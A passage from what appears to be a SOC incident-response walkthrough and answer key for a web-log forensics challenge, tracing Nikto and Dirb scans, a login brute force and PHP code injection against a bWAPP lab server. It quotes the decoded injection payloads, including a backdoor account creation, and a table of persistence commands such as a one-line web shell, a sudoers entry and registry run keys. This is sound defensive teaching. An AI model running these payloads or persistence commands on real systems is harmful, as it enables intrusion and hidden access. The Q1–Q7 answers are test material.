grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20

# All unique post-login endpoints (excluding login.php)
grep "Firefox/52.0" attacker_traffic.log | grep -v "login.php" | awk '{print $6, $7}' | sort | uniq -c | sort -rn

This log — post-login activity sequence:

12:50:10  GET  /bWAPP/portal.php                     200   (landing page after login)
12:50:15  POST /bWAPP/portal.php                     302   (selecting a vulnerability from the menu)
12:50:15  GET  /bWAPP/phpi.php                       200   (opened PHP Injection page)
12:50:17  GET  /bWAPP/phpi.php?message=test          200   (tested the parameter)
12:51:37  GET  /bWAPP/phpi.php?message=test          200   (tested again — confirming it works)
12:52:36  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 1)
12:52:46  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 2)
12:52:56  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 3)
12:53:13  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 4)
12:53:23  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 4 repeated)

The attacker’s methodology visible in this sequence:
1. Land on portal, select a vulnerability category
2. Open the vulnerable page (phpi.php = PHP Injection page)
3. Test with benign input (message=test) twice to confirm the parameter is processed
4. Begin injecting OS commands once confident the parameter is vulnerable

This is systematic, professional reconnaissance-then-exploit behavior — not guessing.


STEP 18 — Identify the attack type from the endpoint and parameter pattern

Why: The endpoint name phpi.php (PHP Injection) and the pattern of the message parameter accepting and apparently executing arbitrary content points to one specific attack category. Confirming this requires looking at the parameter values — even URL-encoded, certain characters are recognizable as injection syntax.

# Extract all raw URL-encoded payloads sent to the injection endpoint
grep "phpi.php" attacker_traffic.log | awk '{print $7}'

# With timestamps to show execution sequence
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'

# Check what response body sizes were returned — changing sizes prove dynamic execution
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'

This log — confirmed raw payloads:

12:50:15  /bWAPP/phpi.php                                                           (no param — baseline)
12:50:17  /bWAPP/phpi.php?message=test                                              (benign test)
12:51:37  /bWAPP/phpi.php?message=test                                              (benign test repeated)
12:52:36  /bWAPP/phpi.php?message=%22%22;%20system(%27whoami%27)                    (PAYLOAD 1)
12:52:46  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%27)                (PAYLOAD 2)
12:52:56  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20share%27)               (PAYLOAD 3)
12:53:13  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)  (PAYLOAD 4)
12:53:23  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)  (PAYLOAD 4 repeat)

Even before full decoding, the URL-encoded strings reveal:

  • %22%22 = "" — empty string used to break PHP string context
  • %3B or ; — semicolon separating PHP statements
  • system( — PHP function that executes OS shell commands
  • %27 — single quotes wrapping OS commands passed to system()

Response body sizes from the injection requests:

12:50:15  200  12735   (baseline page — no payload)
12:50:17  200  12759   (message=test — 24 bytes larger than baseline)
12:52:36  200  12778   (whoami payload — different size = dynamic output returned)
12:52:46  200  13045   (net user — much larger = command output returned in response)
12:52:56  200  13175   (net share — larger still = share list returned)
12:53:13  200  12755   (net user /add — smaller = brief success/failure message)

The changing body sizes are decisive proof of execution: Each injection returns a different body size because the server is including the OS command output in the response HTML. A non-vulnerable page would return identical body sizes regardless of parameter values.

Q5 ANSWER: Code Injection
(Full technical classification: PHP Code Injection executing OS commands via system())


STEP 19 — Decode all payloads

Why: URL-encoded payloads must be fully decoded to understand what OS commands were executed on the victim system. This is non-negotiable for the incident report.

# Decode Payload 1
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27whoami%27)'))
HEREDOC

# Decode Payload 2
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%27)'))
HEREDOC

# Decode Payload 3
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20share%27)'))
HEREDOC

# Decode Payload 4 (the persistence payload)
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

Alternative — decode all payloads with full context directly from the log:

grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
    p=line.strip().split()
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"

This command outputs each payload with its timestamp, timezone, HTTP status code, and body size alongside the decoded URL — giving full investigative context in a single pass.

URL encoding reference:

EncodedDecodedRole in injection
%22"Double quote — breaks out of PHP string context
%3B or ;;Semicolon — chains PHP statements
%20 Space — separates command and arguments
%27'Single quote — wraps OS command passed to system()
%2F/Forward slash — used in command flags like /add

Decoded payload table — complete:

#TimestampDecoded PayloadOS CommandPurpose
112:52:36""; system('whoami')whoamiIdentify the OS user running the web server
212:52:46""; system('net user')net userList all local user accounts on the system
312:52:56""; system('net share')net shareMap all network shares accessible from this machine
412:53:13""; system('net user hacker Asd123!! /add')net user hacker Asd123!! /addCreate backdoor account
412:53:23(Payload 4 repeated)(same)Confirmation execution

Injection mechanism — how ""; system('COMMAND') works:

The phpi.php page takes user input via the message parameter and evaluates it as PHP code. The attacker’s injection string exploits this directly:

""           → Empty string satisfies the PHP expression parser
;            → Ends the current PHP statement
system('X')  → Calls PHP's built-in system() function
               system() passes its argument to the OS shell and captures stdout
               The output is embedded in the HTTP response body

This is why the response body sizes changed with each command — the server was including actual OS command output in the HTML page returned to the attacker.

Q6 ANSWER: whoami
(The first payload injected was system('whoami'), which decodes from %22%22;%20system(%27whoami%27))


PHASE 8 — PERSISTENCE INVESTIGATION

Determine if the attacker planted a persistent foothold — answers Q7


STEP 20 — Understand persistence in the context of web logs

Why: Persistence means the attacker created something that survives beyond the current session — a mechanism to re-enter the system even after the web vulnerability is patched, the session expires, or the machine is rebooted. Web logs record the HTTP requests that triggered these actions. Detecting persistence from logs means identifying OS commands that create lasting artifacts.

Persistence indicators by category:

CategoryOS CommandWhat it creates
Account creation (Windows)net user USERNAME PASS /addNew local user account
Privilege escalation (Windows)net localgroup administrators USERNAME /addAdds user to admin group
Account creation (Linux)useradd USERNAME or adduser USERNAMENew local user account
Sudo access (Linux)echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoersPasswordless sudo
Web shell (both)echo "<?php system($_GET['c']); ?>" > shell.phpBackdoor script on web server
Scheduled task (Windows)schtasks /create /tn ...Recurring execution
Cron job (Linux)crontab -e or echo ... | crontabRecurring execution
Registry run key (Windows)reg add HKLM\...\Run /v name /d commandExecute on every boot
File download (both)wget http://... -O filename or curl ... -o filenameFetch remote payload

STEP 21 — The correct persistence search method

Why this method is required: All attack payloads in an access log are stored in their URL-encoded form. When an attacker injects net user hacker Asd123!! /add through a URL parameter, the log records it as net%20user%20hacker%20Asd123!!%20/add — with spaces encoded as %20. Searching for plaintext terms such as net user or useradd directly against the raw log will return no results because those exact strings do not exist in the file as written. Every persistence search must account for URL encoding or first decode the payloads before searching.

What this achieves: By using URL-encoded search patterns or working against decoded output, you accurately detect all persistence-related commands the attacker may have injected — including account creation, privilege escalation, scheduled tasks, web shell planting, file downloads, and registry modifications — regardless of how they were encoded in transit.

Variation A — search for URL-encoded patterns directly in the log:

# Windows account creation — net user with /add flag
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"

# Validate with the exact known pattern
grep "net%20user%20hacker" attacker_traffic.log

# Linux account creation
grep "phpi.php" attacker_traffic.log | grep -i "useradd\|adduser\|user%20add"

# Privilege escalation via group membership
grep "phpi.php" attacker_traffic.log | grep -i "localgroup\|sudoers\|sudo"

# File writing — web shell creation
grep "phpi.php" attacker_traffic.log | grep -i "echo.*php\|echo.*shell\|echo.*cmd"

# File download
grep "phpi.php" attacker_traffic.log | grep -i "wget\|curl%20\|curl+"

# Scheduled persistence
grep "phpi.php" attacker_traffic.log | grep -i "schtask\|crontab\|at%20"

# Registry persistence
grep "phpi.php" attacker_traffic.log | grep -i "reg%20add\|HKLM\|HKCU"

Variation B — decode all payloads first, then search the decoded output:

# Extract and decode all phpi.php parameters, save to a decoded file
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log

# View all decoded payloads
cat decoded_payloads.log

# Search decoded output using plaintext terms — all persistence categories
grep -i "net user.*add\|useradd\|adduser"   decoded_payloads.log
grep -i "localgroup\|administrators\|sudo"  decoded_payloads.log
grep -i "echo.*php\|shell\|webshell"        decoded_payloads.log
grep -i "wget\|curl"                        decoded_payloads.log
grep -i "schtasks\|crontab\|cron"           decoded_payloads.log
grep -i "reg add\|registry"                 decoded_payloads.log

Why Variation B is superior for complex investigations:
Searching decoded text eliminates the need to manually translate every persistence indicator into its URL-encoded form. In logs with many payloads or novel encoding, decoding first and searching second is more reliable and catches edge cases.


STEP 22 — Execute the persistence search and identify the payload

# PRIMARY SEARCH — Windows account creation via net user
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"

This log — confirmed results:

192.168.199.2 - - [20/Jun/2021:12:53:13 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

192.168.199.2 - - [20/Jun/2021:12:53:23 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

All other persistence categories return no results — confirmed absent:

SearchResultConclusion
grep -i "useradd\|adduser"No outputNo Linux user creation attempted
grep -i "localgroup\|sudoers"No outputNo privilege escalation in injection phase
grep -i "echo.*php\|wget\|curl"No outputNo web shell or file download attempted
grep -i "schtask\|crontab"No outputNo scheduled task created
grep -i "reg%20add\|HKLM"No outputNo registry modification attempted

Important scoping note: Running grep "localgroup\|administrators" against the full attacker_traffic.log without the phpi.php filter returns results — but they are Nikto and Dirb scanning probes like GET /bwapp/administrators/ 404 and GET /bwapp/_vti_pvt/administrators.pwd 404. These are reconnaissance requests, not injected commands. Always scope persistence searches to the injection endpoint (phpi.php) to prevent false positives from earlier scanning phases.


STEP 23 — Extract and document the persistence payload precisely

Why: The incident report and containment response require the exact payload in the exact format it appeared in the log. Additionally, confirming the payload executed successfully (HTTP 200 with consistent body size) establishes that the backdoor account was likely created on the victim system.

# Confirm the payload and its HTTP response
grep "net%20user%20hacker" attacker_traffic.log

# Verify the server returned HTTP 200 (payload was processed)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'

# Decode the persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

This log — confirmed results:

Response codes:  200  12755    (both executions)
                 200  12755    (identical body sizes)

Decoded payload: ""; system('net user hacker Asd123!! /add')

Why both executions returned body size 12755:
The net user ... /add command produces a brief text output (“The command completed successfully.” or similar). Both executions returned the same body size, meaning the same response was served twice — consistent with the command executing successfully both times.

Why it was executed twice:
When injecting commands through a web application without direct terminal access, the attacker cannot see stderr or confirm execution status. Running the same persistence command twice at a 10-second interval is standard practice to ensure it executed. The identical response sizes suggest both ran without error.

Operational impact:
net user hacker Asd123!! /add creates a local Windows user account named hacker with password Asd123!!. This account:

  • Persists across reboots
  • Persists after the web application vulnerability is patched
  • Can be used for direct login via RDP (port 3389), SMB (port 445), or any service accepting local Windows credentials
  • Provides re-entry to the victim machine independent of the web application

STEP 24 — Record the persistence payload in both formats

Why: The forensically precise representation of the payload is the raw URL-encoded inner command exactly as it appears in the log — this is what was transmitted over the network and what constitutes the evidence in the log file.

Raw URL-encoded persistence payload (as it appears in the log):

%27net%20user%20hacker%20Asd123!!%20/add%27

Breaking down this exact string:

%27         → '   (opening single quote)
net         → net  (literal — not encoded)
%20         → (space)
user        → user  (literal)
%20         → (space)
hacker      → hacker  (literal)
%20         → (space)
Asd123!!    → Asd123!!  (literal — the !! is NOT URL-encoded in the log)
%20         → (space)
/add        → /add  (literal — the / is NOT URL-encoded in the log)
%27         → '   (closing single quote)

Complete URL parameter as it appears in the log:

/bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)

Q7 ANSWER: Yes — persistence was established.
Related payload: %27net%20user%20hacker%20Asd123!!%20/add%27


PHASE 9 — FINAL VERIFICATION AND CLOSURE

Confirm all attacker traffic is accounted for before closing the investigation


STEP 25 — Verify total traffic attribution

Why: Before declaring an investigation complete, a SOC analyst must confirm that every request from the attacker IP has been categorised into a known phase. Unaccounted traffic is a red flag — it may represent an additional attack vector, a tool phase you missed, or a second attacker entirely. The investigation cannot be closed until the arithmetic balances to zero remainder.

The correct method for this log:

The three confirmed tool phases were identified by their User-Agent strings. The cleanest way to surface unaccounted traffic is therefore to subtract those three populations from the total using chained grep -v (invert match) commands. This approach searches the entire raw line — not just a parsed field — which means it is immune to the field-misalignment problem that affects awk -F'"' on structurally malformed lines.

# Step 1 — Establish the total attacker request count
grep "192.168.199.2" access.log | wc -l

# Step 2 — Count each confirmed phase
grep "Nikto"       attacker_traffic.log | wc -l
grep "MSIE 6.0"    attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l

# Step 3 — Isolate exactly what remains: lines that match NONE of the three known tools
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | wc -l

# Step 4 — Identify the User-Agents of the remaining lines
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | awk -F'"' '{print $6}' | sort | uniq -c | sort -rn

# Step 5 — Inspect all 83 raw lines to confirm their content and phase
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0"

# Step 6 — Confirm the investigation closes cleanly at the last known event
grep "192.168.199.2" access.log | tail -5

This log — confirmed terminal results:

Step 1 — Total:
  12528

Step 2 — Phase counts:
  7455   Nikto
  4816   MSIE 6.0
   174   Firefox/52.0

Step 3 — Unaccounted count:
  83

Step 4 — User-Agent breakdown of the 83 lines:
  74   -           (null UA — no User-Agent header sent at all)
   5   ./.\\\      (Nikto path traversal evasion — UA set to a traversal string)
   4               (empty string UA — blank UA header sent)
  --
  83   total ✓

Step 5 — Raw line content of the 83 (representative sample):
  12:36:24  GET /bwapp/4RaXX5Ac.xml                         400  (Nikto extension probe)
  12:36:33  GET /bwapp/site/' UNION                         400  (SQL injection test)
  12:36:33  GET /bwapp/postnuke/...XSS payload...           400  (XSS injection test)
  12:36:34  GET /bwapp/index.php?action=search&...XSS...    400  (XSS injection test)
  12:36:34  GET /bwapp/cgi-bin/handler/...cat /etc/passwd   400  (OS command injection test)
  12:36:39  GET /bwapp/forum.asp?n=../../boot.ini|...SQL... 400  (Path traversal + SQLi test)
  12:36:46  GET /bwapp/...?mfh_root_path=http://cirt.net/.. 400  (RFI probe)
  12:36:54  <script>alert(1)</script> /bwapp/ HTTP/1.1      400  (XSS injected into method field)
  12:36:56  GET /bwapp/MediaServerDevDesc.xml               400  (Service discovery probe)
  (... 74 additional lines, all within the 12:36:24–12:36:57 Phase 1 window)

Step 6 — Final 5 lines in the log:
  12:52:36  GET /bWAPP/phpi.php?message=...whoami...        200  Firefox/52.0
  12:52:46  GET /bWAPP/phpi.php?message=...net user...      200  Firefox/52.0
  12:52:56  GET /bWAPP/phpi.php?message=...net share...     200  Firefox/52.0
  12:53:13  GET /bWAPP/phpi.php?message=...hacker.../add    200  Firefox/52.0
  12:53:23  GET /bWAPP/phpi.php?message=...hacker.../add    200  Firefox/52.0

Analysis of the 83 unaccounted lines:

All 83 lines fall within the Phase 1 time window (12:36:2412:36:57) and contain Nikto’s characteristic probe patterns — random extension strings, cirt.net/rfiinc.txt RFI payloads, path traversal sequences, XSS test strings, and SQL injection fragments. They are Nikto Phase 1 requests where Nikto deliberately suppressed or replaced its standard User-Agent header as part of its built-in evasion test battery.

Why grep "Nikto" missed them: Nikto’s evasion tests intentionally omit or replace the Nikto string from the User-Agent for those specific requests. Because our Phase 1 count (grep "Nikto" | wc -l) only matches lines containing the literal string “Nikto”, these 83 evasion-mode lines were correctly excluded from that count. They are not missing — they were deliberately held out of the Phase 1 UA bucket so the unaccounted step would surface them explicitly.

Why awk -F'"' works correctly on these 83 lines: The structurally malformed lines identified in Step 2B all contain the Nikto attack payload text and therefore all contain the string “Nikto” — they are filtered out by grep -v "Nikto" before awk -F'"' ever sees them. The 83 lines that reach awk are all well-formed log entries (all returned 400 326), so the quote-delimited field extraction produces clean, accurate results: 74 -, 5 ./.\\\, 4 (empty).

UA breakdown explained:

User-AgentCountWhat it means
- (null)74Nikto sent these requests with no UA header at all — the server logs a literal - in the UA position. Nikto uses this to test whether the target blocks scanner UAs.
./.\\\ (traversal string)5Nikto set its UA to a path traversal string (./.\\\) to test whether the server or WAF treats the UA field as an injection point.
(empty string)4Nikto sent a blank UA string. Functionally similar to null but technically distinct — an empty string vs an absent header.

Final arithmetic — complete traffic reconciliation:

Phase 1  Nikto (standard UA lines)   7,455
Phase 1  Nikto (evasion UA lines)       83   ← surfaced by this step
Phase 2  Dirb                         4,816
Phase 3  Firefox/52.0 (brute force)     174  (includes Phase 4 injection)
                                     ------
Total                                12,528  ✓

Cross-check A:  12,445 (grep subtotal) + 83 (evasion) = 12,528  ✓
Cross-check B:   7,455 + 83 + 4,816 + 174            = 12,528  ✓

All 12,528 attacker requests are fully attributed. The unaccounted remainder is zero. The last five entries in the log are the final Phase 4 injection payloads — the investigation closes at the exact moment the attacker executed their persistence command for the second time at 12:53:23. No post-persistence activity, no cleanup, no additional phases. Investigation is complete.


STEP 26 — Complete incident summary

INCIDENT SUMMARY
================
Log File:         access.log
Attacker IP:      192.168.199.2
Target IP/App:    192.168.199.5 / bWAPP (buggy web application)
Total Requests:   12,528 (99.77% of all traffic in the log)
Incident Window:  20/Jun/2021  12:36:24 → 12:53:23  (17 min 1 sec)

ATTACK PHASE SEQUENCE:

Phase 1 — Web Reconnaissance                              [Q1: nikto]
  Tool:       Nikto v2.1.6
  UA:         Mozilla/5.00 (Nikto/2.1.6) (Evasions:None)
  Timeframe:  12:36:24 → 12:36:57  (33 seconds)
  Volume:     7,455 requests
  Activity:   Automated scan for CVEs, dangerous files, misconfigurations
              Shellshock probe (CVE-2014-6271), extension enumeration
  Findings:   bWAPP application on /bWAPP/, login page at /bWAPP/login.php

Phase 2 — Directory Listing Discovery                     [Q2: directory brute force]
  Technique:  Directory Brute Force
  Tool:       Dirb
  UA:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  Note:       UA confirmed as Dirb's known default; behavior-verified
  Timeframe:  12:37:50 → 12:38:02  (~12 seconds)
  Volume:     4,816 requests
  Activity:   Wordlist-based directory and file enumeration
  Result:     Predominantly 404 — mapped accessible paths

[ATTACKER GAP: 3 min 32 sec — reviewing results, selecting next tool]

Phase 3 — Third Attack                                    [Q3: Brute force | Q4: Yes]
  Technique:  Brute Force (Login Credential Brute Force)
  UA:         Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Firefox/52.0
  Timeframe:  12:41:34 → 12:49:35  (~8 minutes)
  Volume:     134 POST requests to /bWAPP/login.php
  Failures:   132 × HTTP 200, body 4086 bytes (identical failed-login page)
  Success:    2 × HTTP 302 (redirect = valid credentials found)
  Breach:     First successful login: 12:49:35
  Result:     Authenticated access to bWAPP portal confirmed at 12:50:10

Phase 4 — Fourth Attack                                   [Q5: Code Injection | Q6: whoami]
  Technique:  PHP Code Injection / OS Command Injection
  Endpoint:   /bWAPP/phpi.php?message=
  Timeframe:  12:50:15 → 12:53:23  (~3 minutes)
  Volume:     8 injection requests (2 test, 6 live payloads)

  Payload sequence:
    12:50:17  message=test                              (parameter probe — benign)
    12:51:37  message=test                              (probe repeated — confirmed working)
    12:52:36  system('whoami')          → Q6 ANSWER     (identify OS user)
    12:52:46  system('net user')                        (enumerate local accounts)
    12:52:56  system('net share')                       (enumerate network shares)
    12:53:13  system('net user hacker Asd123!! /add')  → Q7 ANSWER (PERSISTENCE)
    12:53:23  system('net user hacker Asd123!! /add')   (repeated for confirmation)

  All payloads: HTTP 200 with varying body sizes — all executed successfully

Persistence:                                              [Q7: Yes]
  Method:     Windows local user account creation via net user /add
  Account:    Username: hacker | Password: Asd123!!
  Payload:    %27net%20user%20hacker%20Asd123!!%20/add%27
  Executed:   12:53:13 (confirmed again at 12:53:23)
  Impact:     Backdoor account survives patching, reboots, and session expiry

STEP 27 — Indicators of Compromise (IOCs)

Document these IOCs and submit them to your threat intelligence platform and detection engineering team immediately upon investigation closure.

INDICATORS OF COMPROMISE
=========================

Network IOCs:
  Attacker IP:    192.168.199.2
  Target IP:      192.168.199.5
  Protocol:       HTTP (port 80)
  Incident Date:  20 Jun 2021

Tool Signatures (User-Agent IOCs):
  Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)
  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)   [Dirb default UA]
  Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Endpoint IOCs:
  /bWAPP/phpi.php                       [Exploited PHP Injection page]
  /bWAPP/login.php                      [Brute-forced login page]

Payload IOCs (URL-encoded):
  %22%22;%20system(%27whoami%27)
  %22%22;%20system(%27net%20user%27)
  %22%22;%20system(%27net%20share%27)
  %22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)

Host IOCs (victim system — Windows):
  New local user account:   hacker
  Account password:         Asd123!!
  Creation method:          net user hacker Asd123!! /add
  Access vectors enabled:   RDP (TCP/3389), SMB (TCP/445), local Windows auth

Recommended detections to create:
  1. Alert on any User-Agent matching Nikto/2.x.x pattern
  2. Alert on MSIE 6.0 UA string (no legitimate usage since ~2008)
  3. Alert on >50 POST requests to the same login endpoint within 5 minutes from one IP
  4. Alert on HTTP 302 following a sequence of 200s on a login endpoint
  5. Alert on URL parameters containing system(, exec(, passthru(, shell_exec(
  6. Alert on net%20user.*%2Fadd or net user.*/add in web server logs

FINAL ANSWERS — ALL 7 QUESTIONS

#QuestionAnswer
Q1Which automated scan tool did the attacker use for web reconnaissance?nikto
Q2Which technique did the attacker use for directory listing discovery?directory brute force
Q3What is the third attack type after directory listing discovery?Brute force
Q4Is the third attack successful?Yes
Q5What is the name of the fourth attack?Code Injection
Q6What is the first payload for the fourth attack?whoami
Q7Is there any persistency clue? If yes, what is the related payload?Yes — %27net%20user%20hacker%20Asd123!!%20/add%27

COMPLETE KILL CHAIN

12:36:24  PHASE 1 ─── Web Reconnaissance (Nikto v2.1.6)             [Q1: nikto]
          │   7,455 requests in 33 seconds
          │   Scanned CVEs, file extensions, shellshock, misconfigurations
          │   Located bWAPP application and login page structure
          ▼
12:37:50  PHASE 2 ─── Directory Brute Force (Dirb)                  [Q2: directory brute force]
          │   4,816 requests in ~12 seconds
          │   Enumerated directory structure via wordlist
          │   Mapped accessible paths on the target application
          ▼
          [3 min 32 sec — attacker reviewing results, setting up next tool]
          ▼
12:41:34  PHASE 3 ─── Brute Force Attack (Login)                    [Q3: Brute force]
          │   134 POST requests to /bWAPP/login.php over ~8 minutes
          │   132 failures: HTTP 200, body 4086 bytes (identical fail page)
          │   2 successes: HTTP 302 at 12:49:35                      [Q4: Yes]
          │   Portal.php loaded with HTTP 200 at 12:50:10
          ▼
12:50:15  PHASE 4 ─── Code Injection (PHP + OS Command)             [Q5: Code Injection]
          │   Navigated to phpi.php (PHP Injection vulnerable page)
          │   Tested parameter with benign input — confirmed injectable
          │   12:52:36 → system('whoami')                            [Q6: whoami]
          │   12:52:46 → system('net user')
          │   12:52:56 → system('net share')
          │   12:53:13 → system('net user hacker Asd123!! /add')     [Q7: Yes]
          │   12:53:23 → system('net user hacker Asd123!! /add')     (confirmed)
          └── Backdoor account "hacker / Asd123!!" created on victim machine

QUICK REFERENCE — ALL COMMANDS IN SEQUENCE

# ─── PHASE 1: SCOPE ──────────────────────────────────────────────────────────
wc -l access.log
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'

# Step 2A — format verification
head -3 access.log
head -1 access.log | awk '{print NF}'

# Step 2B — log integrity check (Part A: compliance count)
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

# Step 2B — log integrity check (Part B: isolate malformed lines)
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l

# ─── PHASE 2: IDENTIFY ATTACKER ──────────────────────────────────────────────
awk '{print $1}' access.log | sort | uniq -c | sort -rn
grep "192.168.199.2" access.log | head -20
grep "192.168.199.2" access.log | tail -20
grep "192.168.199.2" access.log > attacker_traffic.log
wc -l attacker_traffic.log

# ─── PHASE 3: FINGERPRINT TOOLS — Q1, Q2 ─────────────────────────────────────
# Full UA inventory — all IPs, unfiltered, verbose Nikto output expected
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation — Nikto variants collapsed, clean triage view
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Attacker-only UA detail (run after attacker_traffic.log is created)
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn
grep "Nikto"    attacker_traffic.log | wc -l
grep "Nikto"    attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto"    attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -20
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30

# ─── PHASE 4: TIMELINE ────────────────────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4}'

# ─── PHASE 5: PROFILE PHASE 3 — Q3 ───────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
wc -l phase3_traffic.log
awk '{print $6}' phase3_traffic.log | sort | uniq -c
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15

# ─── PHASE 6: CONFIRM SUCCESS — Q4 ───────────────────────────────────────────
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"

# ─── PHASE 7: FOURTH ATTACK — Q5, Q6 ────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'

# Decode all payloads with full context
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
    p=line.strip().split()
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"

# ─── PHASE 8: PERSISTENCE — Q7 ───────────────────────────────────────────────
# PRIMARY: URL-encoded search for Windows account creation
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
grep "net%20user%20hacker" attacker_traffic.log

# SECONDARY: decode everything first, then search decoded output
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
grep -i "net user.*add\|useradd\|adduser"   decoded_payloads.log
grep -i "localgroup\|sudo\|administrators"  decoded_payloads.log
grep -i "echo.*php\|wget\|curl"             decoded_payloads.log
grep -i "schtasks\|crontab"                 decoded_payloads.log
grep -i "reg add\|HKLM\|HKCU"              decoded_payloads.log

# Confirm execution (HTTP 200 = processed by server)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'

# Decode persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

